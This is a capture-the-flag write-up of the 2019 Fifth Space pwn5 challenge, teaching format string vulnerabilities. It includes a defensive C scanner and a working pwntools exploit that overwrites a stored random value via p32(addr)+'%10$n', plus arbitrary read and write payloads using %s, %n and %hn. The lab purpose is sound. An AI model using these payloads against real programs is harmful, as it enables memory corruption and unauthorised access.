[Fifth space 2019 finals]pwn5
2022-07-23 23:33:00 【Long street 395】
Format string vulnerability
Scenario: the program contains a formatted output function.
If you enter normal characters, the program has no problem.
The condition for a format string vulnerability is that the parameters required by the format string do not match the parameters actually provided.
Why does this compile?
Because printf() is declared with a variable number of parameters.
To find the mismatch, the compiler would have to understand how printf() works and what the format string is. However, the compiler does not know this.
Sometimes the format string is not fixed; it may be generated dynamically while the program runs.
Can printf() detect the mismatch by itself?
printf() takes its parameters from the stack: if it needs 3, it takes 3. Unless the boundary of the stack is marked, printf() cannot know that it is taking more parameters than were provided. And there is no such mark.
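Since printf() itself cannot see the mismatch, the check has to happen before the call. The C program below is an added example (it is not part of the original write-up and not the challenge binary's code): a small scanner that walks a string the way printf parses directives and reports how many arguments the conversions would consume, whether a write directive (%n, %hn, %hhn, %ln) is present, and whether positional %N$ selection is used, so untrusted input can be rejected before it ever reaches a formatting function. The greet_safe function shows the hardened call (user data passed as an argument to "%s") beside the unsafe pattern in a comment. All function and type names are my own; the sample inputs are constructed, one of them being the probe string used later in this write-up.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <ctype.h>

/* Result of scanning a format string. */
typedef struct {
    int  args_needed;   /* number of arguments the conversions would consume */
    bool has_n;         /* contains %n / %hn / %hhn / %ln (a write directive) */
    bool positional;    /* uses %N$ parameter selection */
} fmt_report;

/* Parse fmt the way printf does: skip "%%", then an optional positional
   prefix, flags, width, precision, length modifiers, and one conversion
   character. A '*' width or precision consumes an extra argument. */
fmt_report scan_format(const char *fmt) {
    fmt_report r = {0, false, false};
    const char *p = fmt;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }            /* literal percent sign */
        const char *q = p;                           /* positional: digits then '$' */
        while (isdigit((unsigned char)*q)) q++;
        if (q > p && *q == '$') { r.positional = true; p = q + 1; }
        while (*p && strchr("-+ #0", *p)) p++;       /* flags */
        if (*p == '*') { r.args_needed++; p++; }     /* width taken from an argument */
        else while (isdigit((unsigned char)*p)) p++;
        if (*p == '.') {                             /* precision */
            p++;
            if (*p == '*') { r.args_needed++; p++; }
            else while (isdigit((unsigned char)*p)) p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;     /* length modifiers (h, hh, l, ...) */
        if (*p == '\0') break;                       /* truncated directive at end */
        if (*p == 'n') r.has_n = true;               /* %n family writes to memory */
        r.args_needed++;
        p++;
    }
    return r;
}

/* Policy check for data that must never act as a format string:
   true when the string would drive any conversion at all. */
bool looks_like_format_attack(const char *input) {
    fmt_report r = scan_format(input);
    return r.args_needed > 0 || r.has_n || r.positional;
}

/* Hardened output: user data is an argument, so "%x" or "%n" inside it is
   printed verbatim. The vulnerable form this replaces is  printf(name);
   where the user controls the format string itself. */
void greet_safe(const char *name) {
    printf("%s\n", name);
}

int main(void) {
    /* constructed inputs: a normal name, an offset probe, and a %n write */
    const char *inputs[] = {"alice", "AAAA %08x %08x %08x", "AAAA%10$n"};
    for (int i = 0; i < 3; i++) {
        fmt_report r = scan_format(inputs[i]);
        printf("%-22s args=%d n=%d positional=%d -> %s\n", inputs[i],
               r.args_needed, (int)r.has_n, (int)r.positional,
               looks_like_format_attack(inputs[i]) ? "reject" : "ok");
        greet_safe(inputs[i]);   /* safe regardless of the content */
    }
    return 0;
}
```

For a non-constant format string the compiler's -Wformat warnings cannot help, which is exactly the case this scanner covers; for constant format strings, compiling with -Wformat=2 (or at least -Wformat-security) catches the printf(name) pattern at build time.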
1. View file information
First run file ./pwn to check the file type, then checksec --file=pwn to check the file's protections.
We find a 32-bit program with canary enabled, so a stack overflow cannot be used.
2. IDA decompilation
Here we open the file with 32-bit IDA.
Looking at the main function, we find several suspicious places:
The gist of the program: it puts a random number at 0x804c044, the user enters a username and password, and if the password equals the random number, access is granted.
Seeing printf, together with the canary protection, makes us think of checking for a format string vulnerability.
First we use AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x to calculate the offset:
Because the ASCII code of A is 41 (hex), four A's are 41414141. In the picture we can see that the tenth output is 41414141, so the offset is 10.
After that, we just need to modify the value of dword_804c044 so that our input equals the value of dword_804c044.
And this function:
represents writing four bytes to this address.
For example:
When the payload is aaaa%7$n, the number of characters output is 4, and the program writes 4 into the memory pointed to by 0x61616161.
So we use %10$n to modify it. What we write is also 4, because read(fd, &dword_804C044, 4u); reads in 4 bytes.
So our code is:
from pwn import *

# remote() opens a connection to the challenge server; specify the host and port
io = remote('node4.buuoj.cn', 26427)
# address of dword_804C044, the variable that holds the random number
leak_addr = 0x804C044
io.recvuntil(b'your name:')
# the 4-byte address lands in printf's 10th argument slot; %10$n then writes
# the number of characters printed so far (4) into that address
payload1 = p32(leak_addr) + b'%10$n'
io.sendline(payload1)  # send the name
io.recvuntil(b'your passwd:')
io.sendline(b'4')  # the password must now equal the stored value, 4
io.interactive()  # interact with the shell
Because the password must be the same as the value stored at that address, we set the password to b'4'.



Summary
Some of the knowledge used here:
1. Read from an arbitrary address:
According to the knowledge in 0x01, we just need to change the last %08x to %s to read the data at address 0x61616161. Note that this 0x61616161 is something we control: it is the first four bytes of our input, and those four bytes are the address that gets read. Therefore, by replacing the first four bytes of this payload, we get a complete arbitrary address read.
This payload can also be shortened to aaaa%7$s, where 7 means take the seventh parameter of printf (0x61616161). If you use fixed-width output here, the payload looks like aaaa%7$08x, and the output will be aaaa61616161.
2. Write to an arbitrary address:
First let's understand the role of %n: %n writes the number of characters output so far into memory.
Based on the above, when the payload is aaaa%7$n, the number of characters output is 4, and the program writes 4 into the memory pointed to by 0x61616161. If we need to write a larger number, we have to use fixed-width output. Suppose we need to write 100 into 0x61616161; then the payload becomes aaaa%7$0100n.
Another problem with arbitrary address writes: if we want to write a large number, for example 0x8048320 into 0x61616161, this hex number is 134513440 in decimal, which means 134513440 characters have to be output. Needless to say, the program is bound to crash.
What to do in this situation? We can use %hn to write two bytes at a time. In the example above, we split 0x8048320 into the high two bytes 0x804 and the low two bytes 0x8320; write 0x804 (2052 in decimal) into 0x61616161 – 0x61616162, and 0x8320 (33568 in decimal) into 0x61616163 – 0x61616164. Two writes complete the large value.
Reference links
This was the first time I met this problem; I read many experts' write-ups, and there are even many methods, but here I only used the method of modifying the value. No way around it, a newbie has to work harder. Sorry if I didn't explain it clearly, so please see my reference links:
1. Knowledge explanation
2. Conclusion of the pwn examination
3. Format string vulnerability
4. Explanation of the challenge
5. Many ways